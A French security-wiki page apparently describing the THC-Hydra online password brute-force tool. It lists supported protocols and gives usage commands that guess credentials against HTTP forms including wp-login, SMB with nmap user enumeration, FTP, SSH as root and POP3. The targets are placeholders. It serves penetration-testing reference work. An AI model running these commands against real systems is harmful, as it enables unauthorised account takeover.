Hydra

De wiki.nexiat.fr
Aller à la navigation Aller à la recherche
Fiche express
Domaine Bruteforce d'authentification réseau (en ligne)
Type Cracker multi-protocoles
Interface graphique xhydra
Source thc.org/thc-hydra
Voir aussi Medusa · Patator · Wordlist

THC-Hydra (souvent appelé simplement Hydra) est un outil de bruteforce d'authentification en ligne : contrairement à Hashcat ou John the ripper qui cassent un hash hors-ligne, Hydra teste directement des couples identifiant/mot de passe contre le service cible — plus lent et plus détectable, mais utilisable même quand aucun hash n'est récupérable. Une interface graphique existe, xhydra.

Protocoles supportés

AFP, Cisco AAA/auth/enable, CVS, Firebird, FTP, HTTP-{FORM,GET,HEAD,PROXY}-{GET,POST}, HTTPS variantes, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NCP, NNTP, Oracle (Listener/SID/auth), PC-Anywhere, PCNFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP (+ Enum), SNMP, SOCKS5, SSH (v1/v2), Subversion, Teamspeak, Telnet, VMware-Auth, VNC, XMPP.

Usage

HTTP GET

hydra -l admin -P /usr/share/wordlists/darkc0de.lst -e nsr -f -4 192.168.0.1 http-get http://192.168.0.1/

HTTP HEAD

hydra -L userlist.txt -P wordlist.txt cible.example.com https-head /admin/

HTTP POST (formulaire web)

hydra -l admin -P wordlist.txt cible.example.com http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:Incorrect" -t 4

SMB (avec récupération de la liste d'utilisateurs via nmap)

nmap --script=smb-enum-users 192.168.0.3 -p 445 | perl -le 'while(<STDIN>){if(/^.*?\\(\w+)\s+.*/){print "$1";}}' >> userlist.txt
hydra -L userlist.txt -P wordlist.txt 192.168.0.3 smb

FTP

hydra -L userlist.txt -P wordlist.txt ftp.cible.example.com ftp -f

SSH

hydra -l root -P wordlist.txt ssh://cible.example.com -V

POP3

hydra -l root -P wordlist.txt pop3://cible.example.com -V

(la source historique de cette page indiquait par erreur un schéma ftp:// pour cet exemple POP3 — corrigé ici)

Voir aussi

  • Medusa — alternative directe, mêmes principes
  • Patator — framework de bruteforce plus flexible sur les conditions de succès/échec
  • Wordlist — dictionnaires utilisés en attaque
  • John the ripper — cassage hors-ligne quand un hash est récupérable